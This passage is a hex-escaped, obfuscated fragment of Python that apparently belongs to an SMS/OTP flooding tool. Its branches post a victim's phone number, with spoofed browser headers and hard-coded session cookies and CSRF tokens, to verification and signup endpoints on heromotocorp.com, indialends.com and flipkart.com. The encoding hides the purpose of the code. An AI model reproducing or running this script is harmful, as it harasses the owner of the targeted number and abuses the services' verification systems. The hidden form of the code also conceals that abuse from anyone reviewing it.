77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x2f\x65\x6e\x2d\x69\x6e\x2f\x78\x70\x75\x6c\x73\x65\x32\x30\x30\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d
\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x5f\x6e\x6f\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x61\x6e\x64\x6f\x6d\x65\x27\x3a\x20\x27\x5a\x5a\x55\x43\x39\x57\x43\x43\x50\x33\x6c\x74\x73\x64\x2f\x4a\x6f\x71\x46\x65\x35\x48\x48\x65\x36\x57\x66\x4e\x5a\x66\x64\x51\x78\x71\x69\x39\x4f\x5a\x57\x76\x4b\x69\x73\x3d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x5f\x6e\x6f\x5f\x6f\x74\x70\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x73\x72\x66\x27\x3a\x20\x27\x35\x32\x33\x62\x63\x33\x66\x61\x31\x38\x35\x37\x63\x34\x64\x66\x39\x35\x65\x34\x64\x32\x34\x62\x62\x64\x33\x36\x63\x36\x31\x62\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x2f\x65\x6e\x2d\x69\x6e\x2f\x78\x70\x75\x6c\x73\x65\x32\x30\x30\x2f\x61\x6a\x61\x78\x5f\x64\x61\x74\x61\x2e\x70\x68\x70\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73\x74\x61\x74\x75\x73\x5f\x63\x6f\x64\x65\x3d\x3d\x32\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x35\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x34\x38\x33\x38\x38\x35\x33\x31\x34\x2e\x31\x35\x35\x39\x31\x35
\x37\x36\x34\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31\x2e\x31\x35\x35\x39\x31\x35\x37\x36\x34\x37\x31\x36\x31\x2e\x31\x39\x38\x39\x32\x30\x35\x31\x33\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x69\x50\x4d\x69\x78\x27\x3a\x20\x27\x39\x31\x2e\x39\x39\x30\x39\x31\x38\x35\x32\x32\x36\x39\x36\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x74\x72\x61\x63\x6b\x27\x3a\x20\x27\x53\x45\x4f\x20\x2d\x20\x47\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x6b\x65\x79\x77\x6f\x72\x64\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x6c\x5f\x75\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x75\x74\x6d\x5f\x6d\x65\x64\x69\x75\x6d\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x75\x74\x6d\x5f\x63\x61\x6d\x70\x61\x69\x67\x6e\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x53\x50\x2e\x4e\x45\x54\x5f\x53\x65\x73\x73\x69\x6f\x6e\x49\x64\x27\x3a\x20\x27\x69\x6f\x71\x6b\x65\x6b\x35\x6c\x62\x67\x76\x6c\x64\x6c\x71\x34\x69\x33\x63\x6d\x69\x6a\x63\x73\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x5f\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x75\x74\x6d\x5f\x73\x6f\x75\x72\x63\x65\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x5f\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x75\x72\x6c\x27\x3a\x20\x27\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x72\x65\x66\x65\x72\x72\x61\x6c\x5f\x75
\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x52\x52\x41\x66\x66\x69\x6e\x69\x74\x79\x27\x3a\x20\x27\x37\x34\x37\x65\x30\x63\x32\x36\x36\x34\x66\x35\x63\x62\x36\x31\x37\x39\x35\x38\x33\x39\x36\x33\x64\x38\x33\x34\x66\x34\x38\x39\x39\x65\x65\x65\x39\x66\x36\x63\x38\x64\x63\x63\x37\x37\x33\x66\x63\x30\x35\x63\x65\x34\x35\x66\x61\x30\x36\x62\x32\x34\x31\x37\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x39\x36\x39\x36\x32\x33\x37\x30\x35\x2e\x31\x35\x36\x30\x36\x36\x30\x34\x34\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x74\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x72\x65\x6e\x74\x5f\x75\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x73\x5f\x70\x6c\x62\x74\x27\x3a\x20\x27\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x37\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68
\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30
\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x65\x79\x64\x65\x72\x30\x33\x74\x65\x61\x65\x61\x72\x65\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x65\x72\x74\x79\x73\x76\x66\x6a\x37\x34\x73\x6a\x65\x27\x3a\x20\x63\x63\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6a\x66\x73\x64\x66\x75\x31\x34\x68\x6b\x67\x65\x72\x74\x64\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x6a\x38\x30\x67\x65\x72\x74\x64\x66\x67\x27\x3a\x20\x27\x30\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x61\x2f\x6d\x6f\x62\x69\x6c\x65\x2d\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x5f\x76\x32\x2e\x61\x73\x68\x78\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x68\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34
\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x38\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x38\x2e\x30\x20\x46\x4b\x55\x41\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x34\x31\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x44\x65\x73\x6b\x74\x6f\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20
\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x6c\x6f\x67\x69\x6e\x49\x64\x22\x3a\x5b\x22\x2b\x22\x2b\x63\x63\x2b\x70\x6e\x5d\x2c\x22\x73\x75\x70\x70\x6f\x72\x74\x41\x6c\x6c\x53\x74\x61\x74\x65\x73\x22\x3a\x74\x72\x75\x65\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x36\x2f\x75\x73\x65\x72\x2f\x73\x69\x67\x6e\x75\x70\x2f\x73\x74\x61\x74\x75\x73\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x37\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x54\x27\x3a\x20\x27\x42\x52\x25\x33\x41\x63\x6a\x76\x71\x7a\x68\x67\x6c\x75\x31\x6d\x7a\x74\x39\x35\x61\x79\x64\x7a\x68\x76\x77\x7a\x71\x31\x2e\x31\x35\x35\x38\x30\x33\x31\x30\x39\x32\x30\x35\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x57\x41\x42\x27\x3a\x20\x27\x62\x75\x69\x6c\x64\x2d\x34\x34\x62\x65\x39\x65\x34\x37\x34\x36\x31\x61\x37\x34\x64\x37\x33\x37\x39\x31\x34\x32\x30\x37\x62\x63\x62\x61\x66\x63\x33\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x75\x78\x5f\x75\x69\x64\x27\x3a\x20\x27\x31\x35\x35\x38\x36\x37\x39\x30\x34\x33\x38\x31\x38\x39\x32\x39\x38\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x4d\x43\x56\x53\x5f\x31\x37\x45\x42\x34\x30\x31\x30\x35\x33\x44\x41\x46\x34\x38\x34\x30\x41\x34\x39\x30\x44\x34\x43\x25\x34\x30\x41\x64\x6f\x62\x65\x4f\x72\x67\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x4d\x43\x56\x5f\x31\x37\x45\x42\x34\x30\x31\x30\x35\x33\x44\x41\x46\x34\x38\x34\x30\x41\x34\x39\x30\x44\x34\x43\x25\x34\x30\x41\x64\x6f\x62\x65
\x4f\x72\x67\x27\x3a\x20\x27\x2d\x32\x32\x37\x31\x39\x36\x32\x35\x31\x25\x37\x43\x4d\x43\x49\x44\x54\x53\x25\x37\x43\x31\x38\x30\x34\x31\x25\x37\x43\x4d\x43\x4d\x49\x44\x25\x37\x43\x36\x33\x32\x37\x33\x33\x35\x33\x30\x33\x35\x35\x30\x39\x33\x30\x34\x35\x37\x36\x39\x32\x37\x37\x31\x39\x32\x30\x33\x39\x34\x38\x39\x33\x33\x32\x34\x36\x25\x37\x43\x4d\x43\x41\x49\x44\x25\x37\x43\x4e\x4f\x4e\x45\x25\x37\x43\x4d\x43\x4f\x50\x54\x4f\x55\x54\x2d\x31\x35\x35\x38\x36\x38\x36\x32\x34\x35\x73\x25\x37\x43\x4e\x4f\x4e\x45\x25\x37\x43\x4d\x43\x41\x41\x4d\x4c\x48\x2d\x31\x35\x35\x39\x32\x38\x33\x38\x34\x35\x25\x37\x43\x31\x32\x25\x37\x43\x4d\x43\x41\x41\x4d\x42\x2d\x31\x35\x35\x39\x32\x38\x33\x38\x34\x35\x25\x37\x43\x6a\x38\x4f\x64\x76\x36\x4c\x6f\x6e\x4e\x34\x72\x33\x61\x6e\x37\x4c\x68\x44\x33\x57\x5a\x72\x55\x31\x62\x55\x70\x41\x6b\x46\x6b\x6b\x69\x59\x31\x6e\x63\x42\x52\x39\x36\x74\x32\x50\x54\x49\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x5f\x63\x63\x27\x3a\x20\x27\x74\x72\x75\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x4e\x27\x3a\x20\x27\x32\x2e\x56\x49\x38\x30\x38\x35\x41\x36\x41\x32\x33\x37\x45\x42\x34\x43\x36\x32\x38\x33\x36\x43\x38\x38\x30\x39\x46\x30\x44\x33\x31\x32\x45\x42\x2e\x53\x49\x32\x31\x41\x39\x45\x43\x34\x45\x39\x39\x42\x39\x34\x39\x42\x32\x41\x43\x45\x36\x33\x36\x31\x42\x33\x46\x30\x32\x30\x38\x43\x43\x2e\x56\x53\x31\x38\x37\x36\x34\x39\x42\x32\x42\x30\x36\x41\x34\x34\x43\x36\x39\x38\x32\x34\x30\x30\x36\x37\x31\x30\x43\x42\x36\x44\x38\x33\x2e\x31\x35\x35\x38\x36\x37\x39\x30\x37\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x70\x76\x5f\x70\x6e\x27\x3a\x20\x27\x48\x6f\x6d\x65\x50\x61\x67\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x70\x76\x5f\x70\x6e\x5f\x74\x27\x3a\x20\x27\x48\x6f\x6d\x65\x70\x61\x67\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x27\x3a\x20\x27\x64\x31\x74\x31\x37\x47\x51\x56\x71\x50\x7a\x39\x4b\x50\x7a\x6f\x62\x50\x33\x4d\x34\x47\x51\x6b\x6a\x50\x79\x33\x34\x54\x6a\x66\x4a\x78\x49\x34\x53\x62
\x58\x56\x49\x76\x68\x77\x7a\x6d\x33\x6d\x45\x31\x33\x76\x66\x53\x45\x75\x6c\x6d\x66\x39\x30\x44\x2f\x37\x4c\x37\x31\x30\x71\x55\x70\x4d\x71\x38\x6d\x41\x30\x6b\x32\x62\x78\x36\x62\x32\x44\x75\x77\x49\x53\x34\x67\x3d\x3d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x5f\x73\x71\x27\x3a\x20\x27\x25\x35\x42\x25\x35\x42\x42\x25\x35\x44\x25\x35\x44\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x36\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x20\x46\x4b\x55\x41\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x34\x31\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x44\x65\x73\x6b\x74\x6f\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x